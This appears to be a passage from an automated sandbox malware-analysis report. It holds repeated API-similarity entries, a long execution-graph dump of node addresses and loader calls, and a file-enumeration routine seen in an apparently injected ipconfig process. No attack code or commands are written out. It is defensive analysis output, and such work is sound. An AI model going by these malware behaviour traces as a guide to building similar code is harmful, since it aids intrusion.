                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:2.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                      Total number of Nodes:1210
                                                                                                                                                      Total number of Limit Nodes:123

                                                                                                                                                      Graph

83949->83950 83956 2f37e64 83950->83956 83965 2f3a060 LdrLoadDll 83950->83965 83952 2f37e49 83953 2f37e50 83952->83953 83952->83956 83954 2f3a0a0 2 API calls 83953->83954 83955 2f37e5a 83954->83955 83955->83846 83957 2f3a0a0 2 API calls 83956->83957 83958 2f37eb9 83957->83958 83958->83846 83960 2f28185 83959->83960 83961 2f29b40 LdrLoadDll 83960->83961 83962 2f281b8 83961->83962 83964 2f281dd 83962->83964 83966 2f2b340 83962->83966 83964->83942 83965->83952 83967 2f2b36c 83966->83967 83968 2f38460 LdrLoadDll 83967->83968 83969 2f2b385 83968->83969 83970 2f2b38c 83969->83970 83977 2f384a0 83969->83977 83970->83964 83974 2f2b3c7 83975 2f38710 2 API calls 83974->83975 83976 2f2b3ea 83975->83976 83976->83964 83978 2f391e0 LdrLoadDll 83977->83978 83979 2f384bc 83978->83979 83985 3a52bc0 LdrInitializeThunk 83979->83985 83980 2f2b3af 83980->83970 83982 2f38a90 83980->83982 83983 2f391e0 LdrLoadDll 83982->83983 83984 2f38aaf 83983->83984 83984->83974 83985->83980 84030 2f2bdb0 83986->84030 83988 2f2ccd7 83989 2f2ccf0 83988->83989 84043 2f23d70 83988->84043 83991 2f3a270 2 API calls 83989->83991 83993 2f2ccfe 83991->83993 83992 2f2ccea 84067 2f37430 83992->84067 83993->83850 83996 2f2863b 83995->83996 83997 2f2d080 3 API calls 83996->83997 84003 2f2875b 83996->84003 84000 2f2873c 83997->84000 83998 2f2876a 83998->83854 83999 2f28751 84095 2f25ea0 LdrLoadDll 83999->84095 84000->83998 84000->83999 84001 2f38710 2 API calls 84000->84001 84001->83999 84003->83854 84005 2f391e0 LdrLoadDll 84004->84005 84006 2f2acb0 84005->84006 84006->83855 84006->83862 84006->83863 84008 2f2d3d0 2 API calls 84007->84008 84009 2f375e2 84008->84009 84009->83880 84011 2f27298 84010->84011 84012 2f29b40 LdrLoadDll 84011->84012 84013 2f272b3 84012->84013 84014 2f33e50 LdrLoadDll 84013->84014 84015 2f272c3 84014->84015 84016 2f272fd 84015->84016 84017 2f272cc PostThreadMessageW 84015->84017 84016->83777 84017->84016 84018 2f272e0 84017->84018 84019 2f272ea PostThreadMessageW 84018->84019 84019->84016 
84020->83866 84021->83874 84023 2f38290 2 API calls 84022->84023 84024 2f2aace 84023->84024 84024->83879 84025->83883 84026->83886 84027->83891 84028->83888 84029->83892 84031 2f2bde3 84030->84031 84072 2f2a150 84031->84072 84033 2f2bdf5 84076 2f2a2c0 84033->84076 84035 2f2be13 84036 2f2a2c0 LdrLoadDll 84035->84036 84037 2f2be29 84036->84037 84038 2f2d200 3 API calls 84037->84038 84039 2f2be4d 84038->84039 84040 2f2be54 84039->84040 84079 2f3a2b0 LdrLoadDll RtlAllocateHeap 84039->84079 84040->83988 84042 2f2be64 84042->83988 84044 2f23d7d 84043->84044 84045 2f2b340 3 API calls 84044->84045 84047 2f23e61 84045->84047 84046 2f23e68 84046->83992 84047->84046 84080 2f3a2f0 84047->84080 84049 2f23ec9 84050 2f29e90 LdrLoadDll 84049->84050 84051 2f23fd3 84050->84051 84052 2f29e90 LdrLoadDll 84051->84052 84053 2f23ff7 84052->84053 84084 2f2b400 84053->84084 84057 2f24083 84058 2f3a020 LdrLoadDll 84057->84058 84059 2f24110 84058->84059 84060 2f3a020 LdrLoadDll 84059->84060 84062 2f2412a 84060->84062 84061 2f242a6 84061->83992 84062->84061 84063 2f29e90 LdrLoadDll 84062->84063 84064 2f2416a 84063->84064 84065 2f29d60 LdrLoadDll 84064->84065 84066 2f2420a 84065->84066 84066->83992 84068 2f33e50 LdrLoadDll 84067->84068 84070 2f37451 84068->84070 84069 2f37477 84069->83989 84070->84069 84071 2f37464 CreateThread 84070->84071 84071->83989 84073 2f2a177 84072->84073 84074 2f29e90 LdrLoadDll 84073->84074 84075 2f2a1b3 84074->84075 84075->84033 84077 2f29e90 LdrLoadDll 84076->84077 84078 2f2a2d9 84077->84078 84078->84035 84079->84042 84081 2f3a2fd 84080->84081 84082 2f33e50 LdrLoadDll 84081->84082 84083 2f3a310 84082->84083 84083->84049 84085 2f2b425 84084->84085 84089 2f38310 84085->84089 84088 2f383a0 LdrLoadDll 84088->84057 84090 2f391e0 LdrLoadDll 84089->84090 84091 2f3832c 84090->84091 84092 2f2405c 84091->84092 84094 3a52b80 LdrInitializeThunk 84091->84094 84092->84057 84092->84088 84094->84092 84095->84003 84097 2f391e0 LdrLoadDll 84096->84097 84098 2f3812c 84097->84098 
84101 3a52cf0 LdrInitializeThunk 84098->84101 84099 2f2d40e 84099->83777 84101->84099 84103 2f2bd40 84102->84103 84104 2f2bda5 84102->84104 84103->84104 84159 2f2d010 84103->84159 84104->83907 84106 2f2bd50 84107 2f33a50 8 API calls 84106->84107 84108 2f2bd61 84107->84108 84109 2f33a50 8 API calls 84108->84109 84110 2f2bd6c 84109->84110 84111 2f2bd7a 84110->84111 84167 2f2b7f0 84110->84167 84113 2f33a50 8 API calls 84111->84113 84114 2f2bd88 84113->84114 84115 2f33a50 8 API calls 84114->84115 84116 2f2bd93 84115->84116 84116->83907 84118 2f2cd40 84117->84118 84218 2f32d60 84118->84218 84120 2f2cd81 84256 2f31a50 84120->84256 84122 2f2cd87 84292 2f2ed00 84122->84292 84124 2f2cd8d 84315 2f30bd0 84124->84315 84126 2f2cd95 84347 2f31d70 84126->84347 84130 2f2cda1 84381 2f323e0 84130->84381 84132 2f2cda7 84407 2f2d720 84132->84407 84136 2f2cbf8 84135->84136 84140 2f2cc49 84135->84140 84137 2f2db00 8 API calls 84136->84137 84136->84140 84138 2f2cc33 84137->84138 84138->84140 84593 2f2dd50 84138->84593 84140->83914 84141 2f2ca20 84140->84141 84142 2f2ca3c 84141->84142 84145 2f2cb1b 84141->84145 84143 2f38710 2 API calls 84142->84143 84142->84145 84148 2f2ca57 84143->84148 84144 2f2cbce 84144->83917 84144->83918 84154 2f2cbb1 84145->84154 84650 2f2b570 84145->84650 84146 2f33a50 8 API calls 84146->84144 84150 2f2b570 3 API calls 84148->84150 84149 2f2cb8b 84152 2f2b7f0 5 API calls 84149->84152 84149->84154 84151 2f2ca8f 84150->84151 84153 2f29e90 LdrLoadDll 84151->84153 84152->84154 84155 2f2caa0 84153->84155 84154->84144 84154->84146 84156 2f29e90 LdrLoadDll 84155->84156 84156->84145 84157->83906 84158->83914 84160 2f38460 LdrLoadDll 84159->84160 84161 2f2d037 84160->84161 84162 2f2d03e 84161->84162 84163 2f384a0 2 API calls 84161->84163 84162->84106 84164 2f2d05c 84163->84164 84165 2f38710 2 API calls 84164->84165 84166 2f2d068 84165->84166 84166->84106 84168 2f2b815 84167->84168 84169 2f2b823 84168->84169 84170 2f2b837 84168->84170 84171 2f29e90 LdrLoadDll 84169->84171 
84172 2f29e90 LdrLoadDll 84170->84172 84174 2f2b832 84171->84174 84173 2f2b846 84172->84173 84176 2f2b340 3 API calls 84173->84176 84175 2f29e90 LdrLoadDll 84174->84175 84177 2f2ba34 84174->84177 84178 2f2b8a6 84175->84178 84176->84174 84177->84111 84179 2f29e90 LdrLoadDll 84178->84179 84180 2f2b8d7 84179->84180 84181 2f2b9d0 84180->84181 84182 2f2b400 2 API calls 84180->84182 84183 2f2b400 2 API calls 84181->84183 84185 2f2b8fa 84182->84185 84184 2f2b9e9 84183->84184 84208 2f2b4b0 84184->84208 84187 2f2b905 84185->84187 84188 2f2b9af 84185->84188 84189 2f38710 2 API calls 84187->84189 84192 2f29e90 LdrLoadDll 84188->84192 84190 2f2b90f 84189->84190 84194 2f29e90 LdrLoadDll 84190->84194 84191 2f38710 2 API calls 84191->84177 84192->84181 84193 2f2b9f9 84193->84191 84195 2f2b933 84194->84195 84196 2f2b400 2 API calls 84195->84196 84197 2f2b949 84196->84197 84198 2f38710 2 API calls 84197->84198 84199 2f2b953 84198->84199 84200 2f29e90 LdrLoadDll 84199->84200 84201 2f2b977 84200->84201 84202 2f2b400 2 API calls 84201->84202 84203 2f2b98d 84202->84203 84204 2f2b4b0 2 API calls 84203->84204 84205 2f2b99d 84204->84205 84206 2f38710 2 API calls 84205->84206 84207 2f2b9a7 84206->84207 84207->84111 84209 2f2b4d4 84208->84209 84212 2f38360 84209->84212 84213 2f391e0 LdrLoadDll 84212->84213 84214 2f3837c 84213->84214 84217 3a52fb0 LdrInitializeThunk 84214->84217 84215 2f2b55b 84215->84193 84217->84215 84219 2f32d88 84218->84219 84220 2f29e90 LdrLoadDll 84219->84220 84221 2f32db7 84220->84221 84222 2f2b340 3 API calls 84221->84222 84224 2f32dea 84222->84224 84223 2f32df1 84223->84120 84224->84223 84225 2f29e90 LdrLoadDll 84224->84225 84226 2f32e19 84225->84226 84227 2f29e90 LdrLoadDll 84226->84227 84228 2f32e3d 84227->84228 84229 2f2b400 2 API calls 84228->84229 84230 2f32e61 84229->84230 84231 2f32ea3 84230->84231 84419 2f326c0 84230->84419 84234 2f29e90 LdrLoadDll 84231->84234 84233 2f32e7a 84235 2f33026 84233->84235 84423 2f32ab0 LdrLoadDll NtClose RtlFreeHeap 
LdrInitializeThunk 84233->84423 84236 2f32ec3 84234->84236 84235->84120 84238 2f2b400 2 API calls 84236->84238 84239 2f32ee7 84238->84239 84240 2f32f2d 84239->84240 84242 2f32f04 84239->84242 84244 2f326c0 8 API calls 84239->84244 84241 2f2b400 2 API calls 84240->84241 84243 2f32f5d 84241->84243 84242->84235 84424 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84242->84424 84246 2f32fa3 84243->84246 84247 2f32f7a 84243->84247 84248 2f326c0 8 API calls 84243->84248 84244->84242 84250 2f2b400 2 API calls 84246->84250 84247->84235 84425 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84247->84425 84248->84247 84251 2f33002 84250->84251 84252 2f3304b 84251->84252 84253 2f3301f 84251->84253 84254 2f326c0 8 API calls 84251->84254 84252->84120 84253->84235 84426 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84253->84426 84254->84253 84257 2f31ab4 84256->84257 84258 2f29e90 LdrLoadDll 84257->84258 84259 2f31b81 84258->84259 84260 2f2b340 3 API calls 84259->84260 84262 2f31bb4 84260->84262 84261 2f31bbb 84261->84122 84262->84261 84263 2f29e90 LdrLoadDll 84262->84263 84264 2f31be3 84263->84264 84265 2f2b400 2 API calls 84264->84265 84266 2f31c23 84265->84266 84267 2f31d43 84266->84267 84268 2f326c0 8 API calls 84266->84268 84267->84122 84269 2f31c40 84268->84269 84270 2f31d52 84269->84270 84427 2f31870 84269->84427 84271 2f38710 2 API calls 84270->84271 84274 2f31d5c 84271->84274 84273 2f31c58 84273->84270 84275 2f31c63 84273->84275 84274->84122 84276 2f3a270 2 API calls 84275->84276 84277 2f31c8c 84276->84277 84278 2f31c95 84277->84278 84279 2f31cab 84277->84279 84280 2f38710 2 API calls 84278->84280 84456 2f31760 CoInitialize 84279->84456 84282 2f31c9f 84280->84282 84282->84122 84283 2f31cb9 84458 2f38420 84283->84458 84285 2f31d32 84286 2f38710 2 API calls 84285->84286 84288 2f31d3c 84286->84288 84290 2f3a0a0 2 API calls 84288->84290 84289 2f31cd7 84289->84285 84291 2f38420 LdrLoadDll 84289->84291 84462 2f31690 LdrLoadDll RtlFreeHeap 
84289->84462 84290->84267 84291->84289 84293 2f2ed28 84292->84293 84294 2f3a270 2 API calls 84293->84294 84296 2f2ed88 84294->84296 84295 2f2ed91 84295->84124 84296->84295 84463 2f2e9c0 84296->84463 84298 2f2edb8 84299 2f2edd6 84298->84299 84498 2f307c0 10 API calls 84298->84498 84304 2f2edf0 84299->84304 84500 2f29c90 LdrLoadDll 84299->84500 84301 2f2edca 84499 2f307c0 10 API calls 84301->84499 84305 2f2e9c0 9 API calls 84304->84305 84306 2f2ee1b 84305->84306 84307 2f2ee3a 84306->84307 84501 2f307c0 10 API calls 84306->84501 84309 2f2ee54 84307->84309 84503 2f29c90 LdrLoadDll 84307->84503 84310 2f3a0a0 2 API calls 84309->84310 84313 2f2ee5e 84310->84313 84311 2f2ee2e 84502 2f307c0 10 API calls 84311->84502 84313->84124 84316 2f30bf6 84315->84316 84317 2f30c08 84316->84317 84318 2f30c8e 84316->84318 84320 2f29e90 LdrLoadDll 84317->84320 84319 2f30c6c 84318->84319 84521 2f31d90 84318->84521 84325 2f30c86 84319->84325 84526 2f36b60 84319->84526 84323 2f30c19 84320->84323 84324 2f30c37 84323->84324 84326 2f29e90 LdrLoadDll 84323->84326 84328 2f29e90 LdrLoadDll 84324->84328 84325->84126 84326->84324 84327 2f30d20 84327->84126 84330 2f30c5b 84328->84330 84329 2f30ccb 84329->84327 84331 2f30cea 84329->84331 84332 2f30d2c 84329->84332 84334 2f33a50 8 API calls 84330->84334 84335 2f30cf2 84331->84335 84336 2f30d0f 84331->84336 84333 2f29e90 LdrLoadDll 84332->84333 84337 2f30d3d 84333->84337 84334->84319 84338 2f3a0a0 2 API calls 84335->84338 84339 2f3a0a0 2 API calls 84336->84339 84552 2f30000 84337->84552 84340 2f30d03 84338->84340 84339->84327 84340->84126 84342 2f30e3f 84343 2f3a0a0 2 API calls 84342->84343 84344 2f30e46 84343->84344 84344->84126 84345 2f30d57 84345->84342 84558 2f306f0 8 API calls 84345->84558 84348 2f30bd0 10 API calls 84347->84348 84349 2f2cd9b 84348->84349 84350 2f2fbc0 84349->84350 84351 2f2fbe2 84350->84351 84352 2f29e90 LdrLoadDll 84351->84352 84353 2f2fdad 84352->84353 84354 2f29e90 LdrLoadDll 84353->84354 84355 2f2fdbe 84354->84355 84356 
2f29d60 LdrLoadDll 84355->84356 84357 2f2fdd5 84356->84357 84560 2f2fa90 84357->84560 84360 2f2fa90 11 API calls 84361 2f2fe4b 84360->84361 84362 2f2fa90 11 API calls 84361->84362 84363 2f2fe63 84362->84363 84364 2f2fa90 11 API calls 84363->84364 84365 2f2fe7b 84364->84365 84366 2f2fa90 11 API calls 84365->84366 84367 2f2fe93 84366->84367 84368 2f2fa90 11 API calls 84367->84368 84370 2f2feae 84368->84370 84369 2f2fec8 84369->84130 84370->84369 84371 2f2fa90 11 API calls 84370->84371 84372 2f2fefc 84371->84372 84373 2f2fa90 11 API calls 84372->84373 84374 2f2ff39 84373->84374 84375 2f2fa90 11 API calls 84374->84375 84376 2f2ff76 84375->84376 84377 2f2fa90 11 API calls 84376->84377 84378 2f2ffb3 84377->84378 84379 2f2fa90 11 API calls 84378->84379 84380 2f2fff0 84379->84380 84380->84130 84382 2f323fd 84381->84382 84383 2f29b40 LdrLoadDll 84382->84383 84384 2f32418 84383->84384 84385 2f33e50 LdrLoadDll 84384->84385 84404 2f325e6 84384->84404 84386 2f32442 84385->84386 84387 2f33e50 LdrLoadDll 84386->84387 84388 2f32455 84387->84388 84389 2f33e50 LdrLoadDll 84388->84389 84390 2f32468 84389->84390 84391 2f33e50 LdrLoadDll 84390->84391 84392 2f3247b 84391->84392 84393 2f33e50 LdrLoadDll 84392->84393 84394 2f32491 84393->84394 84395 2f33e50 LdrLoadDll 84394->84395 84396 2f324a4 84395->84396 84397 2f33e50 LdrLoadDll 84396->84397 84398 2f324b7 84397->84398 84399 2f33e50 LdrLoadDll 84398->84399 84400 2f324ca 84399->84400 84401 2f33e50 LdrLoadDll 84400->84401 84402 2f324df 84401->84402 84403 2f326c0 8 API calls 84402->84403 84402->84404 84406 2f32561 84403->84406 84404->84132 84406->84404 84575 2f31fa0 LdrLoadDll 84406->84575 84408 2f2d783 84407->84408 84576 2f30130 84408->84576 84410 2f2d7a6 84411 2f2d7e4 84410->84411 84585 2f2d5d0 84410->84585 84413 2f31d90 8 API calls 84411->84413 84414 2f2d807 84413->84414 84415 2f2d5d0 8 API calls 84414->84415 84416 2f2d845 84414->84416 84415->84416 84417 2f2d5d0 8 API calls 84416->84417 84418 2f2cdcb 84417->84418 84418->83905 84420 
2f3273d 84419->84420 84421 2f33a50 8 API calls 84420->84421 84422 2f328b9 84420->84422 84421->84422 84422->84233 84423->84231 84424->84240 84425->84246 84426->84252 84428 2f3188c 84427->84428 84429 2f29b40 LdrLoadDll 84428->84429 84430 2f318a7 84429->84430 84431 2f318b0 84430->84431 84432 2f33e50 LdrLoadDll 84430->84432 84431->84273 84433 2f318c7 84432->84433 84434 2f33e50 LdrLoadDll 84433->84434 84435 2f318dc 84434->84435 84436 2f33e50 LdrLoadDll 84435->84436 84437 2f318ef 84436->84437 84438 2f33e50 LdrLoadDll 84437->84438 84439 2f31902 84438->84439 84440 2f33e50 LdrLoadDll 84439->84440 84441 2f31918 84440->84441 84442 2f33e50 LdrLoadDll 84441->84442 84443 2f3192b 84442->84443 84444 2f29b40 LdrLoadDll 84443->84444 84445 2f31954 84444->84445 84446 2f33e50 LdrLoadDll 84445->84446 84455 2f319f0 84445->84455 84447 2f31978 84446->84447 84448 2f29b40 LdrLoadDll 84447->84448 84449 2f319ad 84448->84449 84450 2f33e50 LdrLoadDll 84449->84450 84449->84455 84451 2f319ca 84450->84451 84452 2f33e50 LdrLoadDll 84451->84452 84453 2f319dd 84452->84453 84454 2f33e50 LdrLoadDll 84453->84454 84454->84455 84455->84273 84457 2f317c5 84456->84457 84457->84283 84459 2f3842e 84458->84459 84460 2f391e0 LdrLoadDll 84459->84460 84461 2f3843c 84460->84461 84461->84289 84462->84289 84464 2f2ea58 84463->84464 84465 2f29e90 LdrLoadDll 84464->84465 84466 2f2eaf6 84465->84466 84467 2f29e90 LdrLoadDll 84466->84467 84468 2f2eb11 84467->84468 84469 2f2b400 2 API calls 84468->84469 84470 2f2eb36 84469->84470 84471 2f2ecae 84470->84471 84516 2f383a0 LdrLoadDll 84470->84516 84473 2f2ecbf 84471->84473 84504 2f2db00 84471->84504 84473->84298 84474 2f2eb61 84476 2f2eca4 84474->84476 84478 2f2eb6c 84474->84478 84477 2f38710 2 API calls 84476->84477 84477->84471 84479 2f38710 2 API calls 84478->84479 84480 2f2ebaf 84479->84480 84517 2f3a340 LdrLoadDll 84480->84517 84482 2f2ebe8 84483 2f2ebef 84482->84483 84484 2f2b400 2 API calls 84482->84484 84483->84298 84485 2f2ec13 84484->84485 84485->84473 84518 2f383a0 
LdrLoadDll 84485->84518 84487 2f2ec38 84488 2f2ec8b 84487->84488 84489 2f2ec3f 84487->84489 84490 2f38710 2 API calls 84488->84490 84491 2f38710 2 API calls 84489->84491 84492 2f2ec95 84490->84492 84493 2f2ec49 84491->84493 84492->84298 84519 2f2e130 LdrLoadDll 84493->84519 84495 2f2ec66 84495->84473 84520 2f2e740 8 API calls 84495->84520 84497 2f2ec7c 84497->84298 84498->84301 84499->84299 84500->84304 84501->84311 84502->84307 84503->84309 84505 2f2db25 84504->84505 84506 2f29e90 LdrLoadDll 84505->84506 84507 2f2dbe0 84506->84507 84508 2f29e90 LdrLoadDll 84507->84508 84509 2f2dc04 84508->84509 84510 2f33a50 8 API calls 84509->84510 84512 2f2dc57 84510->84512 84511 2f2dd11 84511->84473 84512->84511 84513 2f29e90 LdrLoadDll 84512->84513 84514 2f2dcbe 84513->84514 84515 2f33a50 8 API calls 84514->84515 84515->84511 84516->84474 84517->84482 84518->84487 84519->84495 84520->84497 84522 2f29e90 LdrLoadDll 84521->84522 84523 2f31dac 84522->84523 84524 2f31e65 84523->84524 84525 2f33a50 8 API calls 84523->84525 84524->84319 84525->84524 84527 2f36b6e 84526->84527 84528 2f36b75 84526->84528 84527->84329 84529 2f29b40 LdrLoadDll 84528->84529 84530 2f36ba0 84529->84530 84531 2f3a270 2 API calls 84530->84531 84550 2f36cf4 84530->84550 84532 2f36bb8 84531->84532 84532->84550 84559 2f301a0 LdrLoadDll 84532->84559 84534 2f36bd6 84535 2f33e50 LdrLoadDll 84534->84535 84536 2f36bec 84535->84536 84537 2f33e50 LdrLoadDll 84536->84537 84538 2f36c08 84537->84538 84539 2f33e50 LdrLoadDll 84538->84539 84540 2f36c24 84539->84540 84541 2f33e50 LdrLoadDll 84540->84541 84542 2f36c43 84541->84542 84543 2f33e50 LdrLoadDll 84542->84543 84544 2f36c5f 84543->84544 84545 2f33e50 LdrLoadDll 84544->84545 84546 2f36c7b 84545->84546 84547 2f33e50 LdrLoadDll 84546->84547 84548 2f36ca1 84547->84548 84549 2f3a0a0 2 API calls 84548->84549 84551 2f36ce4 84548->84551 84549->84550 84550->84329 84551->84329 84553 2f30026 84552->84553 84554 2f29e90 LdrLoadDll 84553->84554 84555 2f3005c 84554->84555 84556 
2f2b730 10 API calls 84555->84556 84557 2f3011f 84556->84557 84557->84345 84558->84345 84559->84534 84561 2f2fab9 84560->84561 84562 2f33e50 LdrLoadDll 84561->84562 84563 2f2faf0 84562->84563 84564 2f33e50 LdrLoadDll 84563->84564 84565 2f2fb08 84564->84565 84566 2f33e50 LdrLoadDll 84565->84566 84568 2f2fb24 84566->84568 84567 2f2fbac 84567->84360 84568->84567 84569 2f2fb4e FindFirstFileW 84568->84569 84569->84567 84573 2f2fb69 84569->84573 84570 2f2fb93 FindNextFileW 84572 2f2fba5 FindClose 84570->84572 84570->84573 84572->84567 84573->84570 84574 2f2f970 11 API calls 84573->84574 84574->84573 84575->84406 84577 2f29e90 LdrLoadDll 84576->84577 84578 2f30146 84577->84578 84579 2f3015a 84578->84579 84580 2f29e90 LdrLoadDll 84578->84580 84581 2f29e90 LdrLoadDll 84579->84581 84580->84579 84582 2f30174 84581->84582 84583 2f33a50 8 API calls 84582->84583 84584 2f30188 84582->84584 84583->84584 84584->84410 84586 2f2d600 84585->84586 84587 2f2d715 84585->84587 84588 2f33a50 8 API calls 84586->84588 84587->84411 84589 2f2d618 84588->84589 84589->84587 84590 2f33a50 8 API calls 84589->84590 84591 2f2d648 84590->84591 84591->84587 84592 2f3a0a0 2 API calls 84591->84592 84592->84587 84594 2f2dd75 84593->84594 84595 2f33e50 LdrLoadDll 84594->84595 84596 2f2ddc0 84595->84596 84597 2f2e11f 84596->84597 84598 2f33a50 8 API calls 84596->84598 84597->84140 84599 2f2dddc 84598->84599 84599->84597 84600 2f38960 2 API calls 84599->84600 84601 2f2de12 84600->84601 84602 2f2e107 84601->84602 84603 2f3b380 3 API calls 84601->84603 84604 2f3a0a0 2 API calls 84602->84604 84605 2f2de31 84603->84605 84604->84597 84605->84602 84606 2f2df27 84605->84606 84607 2f38180 2 API calls 84605->84607 84644 2f2aba0 LdrLoadDll LdrInitializeThunk 84606->84644 84608 2f2deb1 84607->84608 84608->84606 84610 2f2deb9 84608->84610 84612 2f2df0d 84610->84612 84613 2f2dedc 84610->84613 84616 2f2aa90 2 API calls 84610->84616 84611 2f2df52 84611->84602 84615 2f2df87 84611->84615 84619 2f2aa90 2 API calls 
84611->84619 84614 2f3a0a0 2 API calls 84612->84614 84617 2f38710 2 API calls 84613->84617 84618 2f2df1d 84614->84618 84645 2f2a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84615->84645 84616->84613 84621 2f2deec 84617->84621 84618->84140 84619->84615 84623 2f375b0 2 API calls 84621->84623 84622 2f2dfa9 84624 2f2e0e6 84622->84624 84625 2f2dfb7 84622->84625 84623->84612 84627 2f3a0a0 2 API calls 84624->84627 84646 2f38780 LdrLoadDll 84625->84646 84628 2f2e0fd 84627->84628 84628->84140 84629 2f2dfd6 84630 2f2d200 3 API calls 84629->84630 84631 2f2e03b 84630->84631 84631->84602 84632 2f2e046 84631->84632 84633 2f3a0a0 2 API calls 84632->84633 84634 2f2e06a 84633->84634 84647 2f382e0 LdrLoadDll 84634->84647 84636 2f2e07e 84637 2f38290 2 API calls 84636->84637 84638 2f2e0a5 84637->84638 84639 2f2e0ac 84638->84639 84648 2f382e0 LdrLoadDll 84638->84648 84639->84140 84641 2f2e0ce 84649 2f380a0 LdrLoadDll 84641->84649 84643 2f2e0dc 84643->84140 84644->84611 84645->84622 84646->84629 84647->84636 84648->84641 84649->84643 84651 2f2b59c 84650->84651 84652 2f2b400 2 API calls 84651->84652 84653 2f2b5e6 84652->84653 84654 2f2b688 84653->84654 84655 2f38420 LdrLoadDll 84653->84655 84654->84149 84658 2f2b60d 84655->84658 84656 2f2b67f 84657 2f38710 2 API calls 84656->84657 84657->84654 84658->84656 84659 2f2b694 84658->84659 84660 2f38420 LdrLoadDll 84658->84660 84661 2f38710 2 API calls 84659->84661 84660->84658 84662 2f2b69d 84661->84662 84663 2f2b400 2 API calls 84662->84663 84666 2f2b70c 84662->84666 84664 2f2b6b6 84663->84664 84665 2f33e50 LdrLoadDll 84664->84665 84664->84666 84665->84666 84666->84149

                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2FB5F
                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2FB9E
                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 02F2FBA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                                                      • Instruction ID: 93345e1fb943929ce854290a9bd039e7b7912c2795d782c2444ffe310714df9d
